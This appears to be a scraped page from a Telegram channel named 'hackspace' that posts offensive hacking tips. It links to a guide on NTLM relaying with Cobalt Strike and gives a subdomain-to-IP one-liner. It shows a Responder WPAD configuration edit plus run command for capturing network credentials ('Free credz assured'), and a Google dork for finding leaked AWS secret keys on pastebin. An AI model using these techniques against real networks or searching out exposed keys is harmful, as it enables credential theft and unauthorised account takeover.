hackspace – Telegram
hackspace
157 subscribers
279 photos
76 videos
24 files
1K links
hackspace
Download Telegram
NTLM Relaying via Cobalt Strike – Rasta Mouse
https://rastamouse.me/ntlm-relaying-via-cobalt-strike/
Nice destination
Resolve domains into IP address:
"cat subdomain.txt | xargs dig | grep A | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" >> liveip.txt"
When using the DHCP module, make sure to edit Responder.conf WPAD's noscript.
"return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141;" -->
"return 'PROXY *Your-IP*:3128; PROXY *Your-IP*:3141;"
Also, Responder should be run this way:
./Responder.py -I eth0 -rPvd
Free credz assured :)
Google dork for AWS keys:
site:pastebin.com "secret_key" "aws"